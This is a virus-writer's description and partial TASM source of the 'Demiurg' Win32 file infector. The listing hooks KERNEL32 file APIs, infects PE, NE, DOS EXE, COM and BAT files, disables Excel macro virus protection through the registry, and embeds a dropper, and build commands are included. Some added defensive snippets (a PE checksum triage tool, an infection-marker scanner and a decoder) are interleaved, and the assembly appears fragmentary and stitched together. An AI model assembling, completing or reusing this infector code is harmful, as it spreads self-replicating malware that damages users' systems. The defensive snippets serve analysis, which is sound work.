TYPE: Win32 global resident (in kernel32.dll) PE/NE/MZ/COM/BAT/XLS infector
SIZE: 16354 bytes
DESCRIPTION:
The main instance of the virus is in infected PE EXE files (or the PE
dropper). If such a file is executed, the first thing the virus does is
getting the needed API addresses by standard methods (first it scans the
host's import table for the GetModuleHandleA API and uses it to get the
KERNEL32 handle if found; if not, it gets it by the "scan down from the
value on the top of the stack" trick; then the export table of KERNEL32 is
scanned for all needed APIs; finally ADVAPI32.dll is also loaded and some
APIs for registry operations are fetched from there). Then the virus performs
two tasks before returning to the host: first it infects KERNEL32.dll, then
MS-Excel.
To infect Excel, the virus checks the registry to see whether a supported
version (97 or 2000) is installed; if so, it turns the macro virus protection
off and gets the path where it is installed. Then it drops a .xls file with a
little macro as \xlstart\demiurg.xls; this file will be loaded automatically
at the next start of Excel, and the macro executed. Besides that, another
macro source code is generated as the C:\demiurg.sys file, which contains VBA
instructions to write the virus PE dropper to C:\demiurg.exe and execute it.
Please note that this macro uses 100% VBA instructions (the binary data is
stored in arrays), no stupid debug scripts. This file will be used to infect
regular .xls files with. This means that the VBA instance of the virus is not
a "full" macro virus, because it is not able to replicate from one .xls file
to another directly.
After the KERNEL32.dll infection, the virus will stay resident after the next
reboot. It then catches most file API functions and infects COM, EXE (MZ, NE,
PE) and BAT files as they are accessed.
The PE EXE infection process is quite standard: the last section is enlarged,
and the virus body is appended after the virtual end of the section. In my
opinion this is much more logical than appending after the physical end, as
is done in most Win32 virii nowadays, because otherwise the virus body can
be overwritten by host data (if the last section is the .bss section, for
example). Besides that, the virtual size is not aligned (although some
compilers/assemblers like TASM align it to SectionAlign, this is not
necessary), while the physical size is always aligned to FileAlign; this
means we can save some space in some cases. Then the entry point is set to
the virus body (in the case of PE EXE files) and finally the image size and
the checksum (in case it was different from zero before infection) are also
updated to maintain compatibility with WinNT; to recalculate the CRC the
CheckSumMappedFile API from IMAGEHLP.dll is used.
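The layout just described (last section grown, body placed after its virtual end, raw size re-aligned to FileAlign, SizeOfImage and CheckSum refreshed) is the same scheme RousSarcoma's overview calls "PE-Appender by increasing last section", and it is what an analyst looks for in a suspect file. The Python below is an added example, not code from the zine or from either author. It parses the PE header fields involved, recomputes the image checksum with the algorithm CheckSumMappedFile uses (a ones' complement sum of the file's 32-bit words, CheckSum field excluded, folded to 16 bits, plus the file length), and reports three triage flags: entry point in the last of several sections, entry section without the execute bit, and a stale CheckSum. The function names, the zero-filled "body" and the minimal PE32 fixture built in memory are all constructed for this example; the fixture is not a real binary. One consequence of the text is visible in the checks: an appender that refreshes the checksum, as Demiurg does, leaves only the section-layout flags, while one that does not also trips the checksum flag.

```python
import struct

def align_up(value, base):
    """FileAlign / SectionAlign rounding; base is a power of two."""
    return (value + base - 1) & ~(base - 1)

def pe_checksum(data, checksum_offset):
    """CheckSumMappedFile's sum: ones' complement over every dword except CheckSum, folded to 16 bits, plus length."""
    padded, total = bytes(data) + bytes((-len(data)) % 4), 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:                 # the field itself is skipped (4-byte aligned in any PE)
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_headers(data):
    """Fields the checks below need; these offsets are the same for PE32 and PE32+."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    entry, = struct.unpack_from("<I", data, opt + 0x10)
    section_align, file_align = struct.unpack_from("<II", data, opt + 0x20)
    checksum, = struct.unpack_from("<I", data, opt + 0x40)
    sections = []
    for i in range(nsections):
        sh = opt + opt_size + 40 * i
        vsize, va, rsize, rptr = struct.unpack_from("<IIII", data, sh + 8)
        chars, = struct.unpack_from("<I", data, sh + 36)
        sections.append(dict(hdr=sh, vsize=vsize, va=va, rsize=rsize, rptr=rptr, chars=chars))
    return dict(opt=opt, entry=entry, section_align=section_align, file_align=file_align,
                checksum=checksum, checksum_off=opt + 0x40, sections=sections)

def checksum_status(data):
    """'unset' (field is zero, nothing to compare), 'ok' or 'mismatch'."""
    h = parse_headers(data)
    if h["checksum"] == 0:
        return "unset"
    return "ok" if pe_checksum(data, h["checksum_off"]) == h["checksum"] else "mismatch"

def entry_section_index(data):
    """Index of the section containing AddressOfEntryPoint, or None."""
    h = parse_headers(data)
    for i, s in enumerate(h["sections"]):
        if s["va"] <= h["entry"] < s["va"] + max(s["vsize"], s["rsize"]):
            return i
    return None

def entry_point_findings(data):
    """Triage flags: entry in the last of several sections, entry section lacking IMAGE_SCN_MEM_EXECUTE, stale CheckSum."""
    sections, idx, findings = parse_headers(data)["sections"], entry_section_index(data), []
    if idx is not None and len(sections) > 1 and idx == len(sections) - 1:
        findings.append("entry-in-last-section")
    if idx is not None and not sections[idx]["chars"] & 0x20000000:
        findings.append("entry-section-not-executable")
    if checksum_status(data) == "mismatch":
        findings.append("checksum-mismatch")
    return findings

def build_sample_pe(stamped=True):
    """Constructed fixture, not a real binary: PE32, 0x200 bytes of headers, .text at RVA 0x1000
    (entry 0x1010) and .data at RVA 0x2000, each 0x100 bytes virtual and 0x200 on disk."""
    img, opt = bytearray(0x600), 0x58
    img[0:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)                                  # e_lfanew
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # file header, 2 sections
    struct.pack_into("<H", img, opt, 0x10B)                                  # PE32 magic
    struct.pack_into("<I", img, opt + 0x10, 0x1010)                          # AddressOfEntryPoint
    struct.pack_into("<II", img, opt + 0x20, 0x1000, 0x200)                  # SectionAlign, FileAlign
    struct.pack_into("<II", img, opt + 0x38, 0x3000, 0x200)                  # SizeOfImage, SizeOfHeaders
    for i, (name, va, rptr, chars) in enumerate([(b".text", 0x1000, 0x200, 0x60000020),
                                                 (b".data", 0x2000, 0x400, 0xC0000040)]):
        sh = opt + 0xE0 + 40 * i
        img[sh:sh + len(name)] = name
        struct.pack_into("<IIII", img, sh + 8, 0x100, va, 0x200, rptr)       # VSize, VA, RawSize, RawPtr
        struct.pack_into("<I", img, sh + 36, chars)
    if stamped:                                                              # what the linker (or Demiurg's
        struct.pack_into("<I", img, opt + 0x40, pe_checksum(img, opt + 0x40))  # CheckSumMappedFile call) does
    return bytes(img)

def simulate_last_section_growth(data, extra):
    """The header arithmetic described above, with a zero-filled body in place of code: last VirtualSize
    += extra (unaligned), SizeOfRawData re-aligned, SizeOfImage re-aligned, entry at old virtual end, CheckSum stale."""
    h = parse_headers(data)
    last = h["sections"][-1]
    new_vsize = last["vsize"] + extra
    new_rsize = align_up(new_vsize, h["file_align"])
    out = bytearray(data[:last["rptr"] + last["vsize"]])            # cut at the old virtual end
    out += bytes(last["rptr"] + new_rsize - len(out))               # body plus alignment padding
    struct.pack_into("<IIII", out, last["hdr"] + 8, new_vsize, last["va"], new_rsize, last["rptr"])
    struct.pack_into("<I", out, h["opt"] + 0x10, last["va"] + last["vsize"])
    struct.pack_into("<I", out, h["opt"] + 0x38, align_up(last["va"] + new_vsize, h["section_align"]))
    return bytes(out)
```

To run it over a real file, pass open(path, "rb").read() to entry_point_findings(); the section-layout flags are heuristics (linkers can legitimately place the entry point in the last section), so treat them as a reason to look closer, while a checksum mismatch on a file whose header carries a non-zero CheckSum is a hard fact that the file changed after linking.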
All other infectable files are only infected "indirectly": a small piece of
code is added that drops a PE dropper and infects it. Because of that the
virus can only replicate in Win32 environments, although it infects a lot of
different file types.
DOS EXE files are also infected in the standard manner: some code is appended
at the end of the file, then the entry point and the stack are set to it, and
the internal file size is recalculated. Slightly interesting is that the virus
is able to infect files with internal overlays that were generated with
Borland compilers; in this case the virus is inserted between the internal
end of the file and the overlay, after the overlay has been shifted back. This
works very well (to my own surprise); try to infect TD.EXE for example.
BAT files are infected by adding some BAT code at the end of the file, then
the character 1Ah (end of text file; BAT files will only be executed until
this character is reached), and after that the PE dropper. The BAT code works
by ECHOing out a small COM file (which was written in such a careful way that
it only contains characters that are legal in BAT files) to C:\DEMIURG.EXE.
Then this file is executed with the name of the BAT file as parameter. Then
the COM file reads the PE drop per from the end of the BAT file and writes it
to C:\DEMIURG.EXE too, and then executes the new file.
NE files are infected with the method that was introduced by Mark Ludwig (I
think): the code segment that contains the entry point is enlarged, the rest
of the file is shifted back and the NE header tables are fixed to reflect the
new layout of the file. Then a small piece of code is injected into the newly
gained room and the entry point set to it; besides that, the PE dropper is
appended at the end of the file as an internal overlay.
ASSEMBLE WITH:
tasm32 /mx /m demiurg.asm
tlink32 /Tpe /aa demiurg.obj,,, import32.lib
~
; ===========================================================================
Extrn ExitProcess:Proc
Extrn MessageBoxA:Proc
.386
.model flat
.data
start:
db 68h ; push imm32
orig_eip dd offset dummy_host ; push host entry point
search_kernel32_descriptor:
mov esi, [ebx+12] ; ESI=name of library RVA
or esi, esi ; last import descriptor ?
JZ failed ; if yes, we failed
add esi, eax ; ESI=name of library VA
lea edi, [ebp+offset kernel32name] ; EDI=name of kernel32 VA
mov ecx, 8 ; ECX=length to compare
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_kernel32_descriptor ; if equal, we found it
found_kernel32_descriptor:
xor edx, edx ; EDX=0 - our counter
push dword ptr [ebx+16] ; RVA of array of API RVAs
mov ebx, [ebx] ; EBX=array of API name ptrs
or ebx, ebx ; are there APIs imported ?
JZ pop_failed ; if not, we failed
add ebx, eax ; EBX=VA of API name ptrs array
search_GetModuleHandle:
mov esi, [ebx] ; ESI=RVA of a API name
or esi, esi ; searched all API names?
JZ pop_failed ; if yes, we failed
test esi, 80000000h ; is it an ordinal ?
JNZ next_API ; can't handle ordinal imports
add esi, eax ; ESI=VA of API name
inc esi ; skip the ordinal hint
inc esi
lea edi, [ebp+offset GetModuleHandleA] ; EDI=VA of GetModuleHandleA
mov ecx, l_GMH ; ECX=length GetModuleHandleA
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_GetModuleHandle
next_API:
inc edx ; increment our API counter
inc ebx ; EBX=ptr to next API name ptr
inc ebx
inc ebx
inc ebx
JMP search_GetModuleHandle ; try next API name
found_GetModuleHandle:
pop ebx ; EBX=RVA of array of API RVAs
add ebx, eax ; EBX=VA of array of API RVAs
mov ebx, [ebx+edx*4] ; EBX=GetModuleHandleA entry
pop_failed:
pop ebx ; remove shit from stack
call infect_kernel32
call infect_excel
push 260
lea eax, [ebp+offset path_buffer1]
push eax
call [ebp+offset GetSystemDirectoryA] ; get the Windows System dir
hook_APIs_loop:
call hook_API ; hook this API
next_hook_API_loop:
inc eax ; search end of string
cmp byte ptr [eax+1], 0
JNE next_hook_API_loop
next_API_name:
inc eax ; EAX=next API name
inc eax
xchg esi, eax ; ESI=next API name
finish_kernel32_infection:
hook_API:
push ebx ; save registers
push ecx
push esi
search_section:
mov esi, [ebx+0Ch] ; ESI=section RVA
cmp esi, edx
JA next_section
add esi, [ebx+8] ; add section virtual size
cmp esi, edx
JA found_section
next_section:
add ebx, 40 ; 40 = section header size
LOOP search_section
section_not_found:
JMP exit_hook_API
found_section:
sub edx, [ebx+0Ch] ; section RVA
add edx, [ebx+14h] ; start of raw data
; EDX=physical offset of
; API RVA in K32 export table
add edx, [ebp+offset mapbase] ; EDX=address in memmap
exit_hook_API:
add edi, API_hook_size ; EDI=next API hook
pop esi
pop ecx
pop ebx
RET
API_hooks:
CreateFileA_hook:
push 12345678h
JMP hookA
CreateFileW_hook:
push 12345678h
JMP hookW
GetFileAttributesA_hook:
push 12345678h
JMP hookA
GetFileAttributesW_hook:
push 12345678h
JMP hookW
SetFileAttributesA_hook:
push 12345678h
JMP hookA
SetFileAttributesW_hook:
push 12345678h
JMP hookW
CopyFileA_hook:
push 12345678h
JMP hookA
CopyFileW_hook:
push 12345678h
JMP hookW
MoveFileExA_hook:
push 12345678h
JMP hookA
MoveFileExW_hook:
push 12345678h
JMP hookW
MoveFileA_hook:
push 12345678h
JMP hookA
MoveFileW_hook:
push 12345678h
JMP hookW
_lopen_hook:
push 12345678h
hookA:
pushf
pusha
call hookA_next
hookA_next:
pop ebp
sub ebp, offset hookA_next
hookW:
pushf
pusha
call hookW_next
hookW_next:
pop ebp
sub ebp, offset hookW_next
pop edi
call infect
WideCharToMultiByte_failed:
popa
popf
RET
try_excel:
; Open the RegKey with the
; MS-Excel Options
lea eax, [ebp+offset reg_handle1] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset regkey] ; which regkey
push eax
push 80000001h ; HKEY_CURRENT_USER
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JZ found_excel
found_excel:
cmp [ebp+office_version_number], "9" ; which version found ?
JE unprotect_Excel2K
unprotect_Excel97:
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset subkey_97] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JNZ failure
unprotect_Excel2K:
lea eax, [ebp+offset regvalue_dword] ; disposition (uninteresting)
push eax
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 0 ; security attributes
push 6 ; access: KEY_SET_VALUE and
; KEY_CREATE_SUB_KEY
push 0 ; REG_OPTION_NON_VOLATILE
push 0 ; address of class string
push 0 ; reserved
lea eax, [ebp+offset subkey_2K] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+RegCreateKeyExA]
or eax, eax
JNZ failure
general_unprotect:
; Now disable the MS-Excel
; macro virus protection.
push 4 ; size of buffer
lea eax, [ebp+offset regvalue_dword] ; address of buffer
push eax
push 4 ; REG_DWORD
push 0 ; reserved
push edx ; offset value name
push [ebp+reg_handle2] ; reg handle
call [ebp+offset RegSetValueExA]
or eax, eax
JNZ failure
mov byte ptr [ebp+sub_name], "b" ; name of the first VBA sub
build_subs_loop:
push esi ; save ESI
push_0:
push 0
build_lines_loop:
push ecx ; save number of lines left
build_nubers_loop:
push ecx ; save ECX
xor eax, eax ; EAX=0
lodsb ; AL=one byte from dropper
mov ecx, 3 ; ECX=3 (number of digits)
number_loop_head:
xor edx, edx ; EDX=0 (high dword for div)
mov ebx, 10 ; EBX=10
div ebx ; EDX=mod, EAX=div
add dl, '0' ; DL=one digit
push edx ; save it
LOOP number_loop_head
dec edi
failure:
RET
; ----- INFECT FILE ---------------------------------------------------------
infect:
push edi
pop edx
infect_bat:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
infect_exe_com:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
infect_com:
mov ecx, [ebp+offset filesize] ; ECX=size of victim file
mov esi, ecx
dec esi
add esi, [ebp+offset mapbase] ; ESI=end of file in memmap
mov edi, esi
add edi, 32
std
rep movsb ; shift whole file back
infect_exe:
cmp word ptr [eax+12h], "JB" ; already infected?
JE already_infected
mov word ptr [eax+12h], "JB" ; mark as infected
dos_exe:
mov bx, [eax+0Eh] ; save relo_SS
mov [ebp+relo_SS], bx
mov bx, [eax+10h] ; save SP_start
mov [ebp+SP_start], bx
mov bx, [eax+14h] ; save IP_start
mov [ebp+IP_start], bx
mov bx, [eax+16h] ; save relo_CS
mov [ebp+relo_CS], bx
with_overlay:
mov esi, [ebp+offset mapbase]
cmp dword ptr [eax+esi], "VOBF" ; internal overlay of borland?
JE infectable_overlay
cmp word ptr [eax+esi+3], "SN" ; ENUNS COM file converted
; by us before?
JNE abort_infection
infectable_overlay:
mov ecx, [ebp+filesize] ; shift internal overlay back
mov esi, ecx
sub ecx, eax
dec esi
add esi, [ebp+mapbase]
mov edi, esi
add edi, (((size_dos_virus_code+15+dropper_size)/16)*16)
std
rep movsb
no_internal_overlays:
add dword ptr [ebp+filesize], (((size_dos_virus_code+15+dropper_size)/16)*16)
add dword ptr [ebp+dos_exe_size], (((size_dos_virus_code+15+dropper_size)/16)*16)
JMP abort_infection
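The DOS EXE path above marks a victim by writing the MASM constant "JB" into the 16-bit word at offset 12h of the MZ header (the e_csum field). Because MASM packs the first character of such a constant into the high byte, the bytes on disk are 'B' followed by 'J', which is also what the dummy_PE image later in this listing carries at that offset. A scanner that looks for that marker is the defensive counterpart of the `already_infected` check. The C below is an added example written for this page, not code from the listing or its author; the names `has_infection_marker` and `scan_file` and the two sample headers are assumptions, and both headers are constructed here rather than taken from any real file.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MZ_HDR_LEN    0x40   /* bytes of the DOS header we inspect */
#define MARKER_OFFSET 0x12   /* e_csum field of IMAGE_DOS_HEADER */

/* Constructed sample headers (assumptions, not from a real binary):
 * a clean MZ header whose e_csum is zero, and the same header with
 * the 'B','J' marker written into e_csum. */
static const unsigned char CLEAN_HDR[MZ_HDR_LEN] = {
    'M', 'Z', 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
    0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    /* remaining bytes are zero */
};

static const unsigned char MARKED_HDR[MZ_HDR_LEN] = {
    'M', 'Z', 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
    0xB8, 0x00, 'B',  'J',  0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

/* Returns 1 if buf is an MZ header carrying the marker, 0 if it is
 * not marked (or not an MZ header at all), -1 if too short to judge. */
int has_infection_marker(const unsigned char *buf, size_t len)
{
    if (len < MARKER_OFFSET + 2)
        return -1;
    if (buf[0] != 'M' || buf[1] != 'Z')
        return 0;
    return (buf[MARKER_OFFSET] == 'B' && buf[MARKER_OFFSET + 1] == 'J') ? 1 : 0;
}

/* Reads the DOS header of a file and applies the check.
 * Same result codes as above, or -2 if the file cannot be opened. */
int scan_file(const char *path)
{
    unsigned char hdr[MZ_HDR_LEN];
    FILE *f = fopen(path, "rb");
    if (!f)
        return -2;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return has_infection_marker(hdr, n);
}

int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        int r = scan_file(argv[i]);
        printf("%s: %s\n", argv[i],
               r == 1 ? "MARKER PRESENT" :
               r == 0 ? "no marker" :
               r == -1 ? "too short" : "cannot open");
    }
    return 0;
}
```

Usage: `./scan a.exe b.exe`. Because e_csum is left at zero by practically every linker in use, a non-zero value in that field is cheap to flag on its own, even before matching the exact 'B','J' bytes.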
; ----- IT IS A NEW EXE FILE ------------------------------------------------
new_exe:
mov ebx, [eax+3Ch] ; EBX=new header offset
add ebx, eax ; EBX=new header in memmap
infect_NE:
mov edi, [ebp+offset filename_ofs]
mov esi, edi
search_pure_filename:
cmp byte ptr [edi], "\"
JNE no_backslash
mov esi, edi
no_backslash:
cmp byte ptr [edi], 0
JE found_end_filename
inc edi
JMP search_pure_filename
found_end_filename:
inc esi
lea edi, [ebp+offset our_filename]
cld
movsd
movsd
movsd
push ecx
mov cl, [ebp+offset shift_value]
shl edi, cl ; start of segment in bytes
pop ecx
pop edi
push edi
add edi, [ebp+offset mapbase]
lea esi, [ebp+offset NE_virus_code]
mov ecx, ebx
cld
rep movsb
segment_loop_head:
movzx eax, word ptr [esi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value db ?
cmp eax, edx ; resource ofs > virus start?
JL segment_ok
add word ptr [esi], bx ; fix up resource offset
segment_ok:
add esi, 8
LOOP segment_loop_head
resources_loop_head:
cmp word ptr [esi], 0 ; end of TypeInfo table?
JE done_resources
NameInfo_loop_head:
movzx eax, word ptr [edi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value2 db ?
JMP abort_infection
infect_PE:
push ebx ; save PE header pointer
openfile:
mov [ebp+offset filename_ofs], edx
stc
ret
get_attribs_ok:
push 80h ; normal attributes
push dword ptr [ebp+offset filename_ofs]
call [ebp+offset SetFileAttributesA]
or eax, eax
JNZ kill_attribs_ok
stc
ret
kill_attribs_ok:
push 0 ; template file (shit)
push 80h ; file attributes (normal)
push 3 ; open existing
push 0 ; security attributes (shit)
push 0 ; do not share file
push 0C0000000h ; read/write mode
push dword ptr [ebp+offset filename_ofs] ; pointer to filename
call [ebp+offset CreateFileA]
mov [ebp+filehandle], eax
inc eax ; was EAX = -1 (INVALID_HANDLE_VALUE)?
JNZ open_ok
stc
ret
open_ok:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileTime]
or eax, eax
JNZ get_time_ok
call closefile
stc
ret
get_time_ok:
push 0 ; high filesize dword ptr
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileSize]
mov [ebp+offset filesize], eax
inc eax
JNZ get_filesize_ok
call closefile
stc
ret
get_filesize_ok:
add eax, workspace-1
JMP mapfile
createfile:
mov [ebp+offset filename_ofs], edx
stc
RET
createfile_ok:
mov dword ptr [ebp+offset attributes], 80h
mapfile:
push 0 ; name file mapping obj (shit)
push eax ; low dword of filesize
push 0 ; high dword of filesize
push 4 ; PAGE_READWRITE
push 0 ; security attributes (shit)
push dword ptr [ebp+offset filehandle]
call [ebp+offset CreateFileMappingA]
mov [ebp+offset maphandle], eax
or eax, eax ; close?
JNZ createfilemapping_ok
call closefile
stc
RET
createfilemapping_ok:
push 0 ; map the whole file
push 0 ; low dword of fileoffset
push 0 ; high dword of fileoffset
push 2 ; read/write access
push dword ptr [ebp+offset maphandle]
call [ebp+offset MapViewOfFile]
mov [ebp+offset mapbase], eax
or eax, eax
JNZ mapfile_ok
call closemaphandle
stc
RET
mapfile_ok:
push eax
xchg edi, eax
add edi, [ebp+offset filesize]
xor eax, eax
mov ecx, workspace
rep stosb
pop eax
clc
RET
closemap:
push dword ptr [ebp+offset mapbase]
call [ebp+offset UnmapViewOfFile]
closemaphandle:
push dword ptr [ebp+offset maphandle]
call [ebp+offset CloseHandle]
closefile:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset SetFileTime]
RET
append_PE:
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
dec ecx ; ECX=number of last section
RET
finish_PE_infection:
end_finish_PE_infection:
RET
GetAPIs:
get_APIs_loop:
push ecx ; save number of APIs
push eax ; save module base address
push edi ; save pointer to address tbl
next_API_loop:
inc esi ; go to next byte
cmp byte ptr [esi], 0 ; reached end of API name?
JNE next_API_loop ; if not, search on
inc esi ; ESI=next API name
RET
My_GetProcAddress:
mov ebx, eax ; EBX=module base address
add ebx, [eax+3Ch] ; EBX=new exe header
mov ebx, [ebx+78h] ; EBX=export directory RVA
add ebx, eax ; EBX=export directory VA
xor ecx, ecx ; ECX=0 (counter)
mov edx, [ebx+18h] ; EDX=NumberOfNames
mov edi, [ebx+20h] ; EDI=AddressOfNames array RVA
add edi, eax ; EDI=AddressOfNames array VA
search_loop:
pusha ; save all registers
mov edi, [edi+ecx*4] ; EDI=RVA of current API name
add edi, eax ; EDI=VA of current API name
cmp_loop:
lodsb ; get a byte from our API name
cmp byte ptr [edi], al ; is this byte equal?
JNE search_on_API ; if not, this isn't our API
inc edi ; compare next byte
or al, al ; reached end of API name ?
JNE cmp_loop ; if not, go on with compare
JMP found_API ; if yes, we found our API!
search_on_API:
popa ; restore all registers
inc ecx ; try the next exported API
cmp ecx, edx ; end of exported APIs?
JL search_loop ; if not, try the next one
API_not_found:
popa ; restore all registers
stc ; indicate error with carry
RET
found_API:
popa ; restore all registers
mov edx, [ebx+24h] ; EDX=AddressOfOrdinals RVA
add edx, eax ; EDX=AddressOfOrdinals VA
movzx ecx, word ptr [edx+ecx*2] ; ECX=our API's ordinal
mov edx, [ebx+1Ch] ; EDX=AddressOfFunctions RVA
lea edx, [edx+ecx*4] ; EDX=RVA of RVA of API
clc ; successful, clear carry
RET
decompress:
add ebx, esi ; EBX=pointer to end of
; compressed data
cld ; clear direction flag
loop_head:
lodsb ; get a byte from compr. data
cmp al, 'æ' ; is it our special byte (0E6h)?
JNE store ; if not, just treat it normal
xor eax, eax ; EAX=0
lodsb ; EAX=number of repetitions
xchg eax, ecx ; ECX=number of repetitions
lodsb ; AL=byte to store repeatedly
rep stosb ; store the byte repeatedly
JMP go_on ; go on with the next byte
store:
stosb ; simply store the byte
go_on:
cmp ebx, esi ; reached the end?
JA loop_head ; if not, just decompress on
RET
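The decompress routine above is a byte-oriented run-length scheme: any byte other than the escape is copied through, and the escape byte 'æ' (0E6h in Windows-1252, the same value that appears as 0E6h throughout the db tables that follow) is followed by a repeat count and the byte to repeat. An analyst unpacking those embedded tables needs a decoder of exactly that format, with the bounds checks the assembly omits. The following C is an added example written for this page, not code from the listing or its author; the names `rle_decode`, `rle_selftest` and the sample stream are assumptions, and the sample is constructed here. Unlike the routine above it rejects an escape cut off by the end of the input and a decoded stream larger than the output buffer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define RLE_ESCAPE 0xE6   /* the listing's 'æ' byte */

/* Decode the listing's run-length format into dst.
 * Returns the number of bytes written, or -1 if an escape is cut off
 * by the end of the input or the output would exceed dst_cap. */
long rle_decode(const unsigned char *src, size_t src_len,
                unsigned char *dst, size_t dst_cap)
{
    size_t in = 0, out = 0;

    while (in < src_len) {                 /* asm: loop while end > ESI */
        unsigned char b = src[in++];       /* lodsb */
        if (b != RLE_ESCAPE) {
            if (out >= dst_cap)
                return -1;
            dst[out++] = b;                /* store: stosb */
            continue;
        }
        if (src_len - in < 2)              /* the asm would read past the end */
            return -1;
        size_t count = src[in++];          /* second lodsb: repeat count 0..255 */
        unsigned char value = src[in++];   /* third lodsb: byte to repeat */
        if (count > dst_cap - out)
            return -1;
        memset(dst + out, value, count);   /* rep stosb; count 0 writes nothing */
        out += count;
    }
    return (long)out;
}

/* Constructed sample (assumption): 'A', three zero bytes, 'B',
 * a literal 0E6h encoded as a run of length 1, then 'C'. */
static const unsigned char RLE_SAMPLE[] = {
    'A', RLE_ESCAPE, 0x03, 0x00, 'B', RLE_ESCAPE, 0x01, RLE_ESCAPE, 'C'
};
static const unsigned char RLE_EXPECTED[] = { 'A', 0, 0, 0, 'B', 0xE6, 'C' };

/* Decodes RLE_SAMPLE; returns 1 if the output equals RLE_EXPECTED. */
int rle_selftest(void)
{
    unsigned char out[16];
    long n = rle_decode(RLE_SAMPLE, sizeof RLE_SAMPLE, out, sizeof out);
    return n == (long)sizeof RLE_EXPECTED &&
           memcmp(out, RLE_EXPECTED, (size_t)n) == 0;
}

/* Input cut off inside the first escape must be rejected. */
int rle_truncated_rejected(void)
{
    unsigned char out[16];
    return rle_decode(RLE_SAMPLE, 2, out, sizeof out) == -1;
}

/* An output buffer too small for the decoded stream must be rejected. */
int rle_overflow_rejected(void)
{
    unsigned char out[4];
    return rle_decode(RLE_SAMPLE, sizeof RLE_SAMPLE, out, sizeof out) == -1;
}

int main(void)
{
    unsigned char out[16];
    long n = rle_decode(RLE_SAMPLE, sizeof RLE_SAMPLE, out, sizeof out);
    printf("decoded %ld bytes:", n);
    for (long i = 0; i < n; i++)
        printf(" %02X", out[i]);
    printf("\n");
    return rle_selftest() ? 0 : 1;
}
```

The decoder keeps the routine's one quirk on purpose: a literal 0E6h can only be expressed as a run of length 1, so a stream that ends with a bare escape byte is malformed rather than a literal.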
create_dropper:
pusha ; save all registers
mov dword ptr [ebp+orig_eip], 401060h ; set EntryRVA for dummy PE
mov dword ptr [ebp+imagebase], 400000h ; set ImageBase for dummy PE
dos_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Dh, 081h
db 0EDh, 006h, 001h, 08Ch, 0D8h, 048h, 08Eh, 0D8h
db 08Bh, 01Eh, 003h, 000h, 081h, 0EBh, 000h, 00Eh
db 0B4h, 04Ah, 0CDh, 021h, 00Eh, 01Fh, 08Ch, 0C0h
db 089h, 086h, 07Eh, 001h, 00Eh, 007h, 0B4h, 03Ch
db 033h, 0C9h, 08Dh, 096h, 06Bh, 001h, 0CDh, 021h
db 093h, 0B4h, 040h, 0B9h
dw dropper_size
db 08Dh, 096h
db 088h, 001h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h
db 0B8h, 000h, 04Bh, 08Dh, 09Eh, 07Ah, 001h, 08Dh
db 096h, 06Bh, 001h, 0CDh, 021h, 007h, 01Fh, 08Ch
db 0C0h, 005h, 010h, 000h, 001h, 086h, 069h, 001h
db 001h, 086h, 05Eh, 001h, 061h, 068h
relo_SS dw ?
db 0FAh, 017h, 0BCh
SP_start dw ?
db 0FBh, 0EAh
IP_start dw ?
relo_CS dw ?
db 043h, 03Ah, 05Ch, 044h, 045h
db 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h, 058h
db 045h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh
size_dos_virus_code EQU ($ - dos_virus_code)
bat_virus_code:
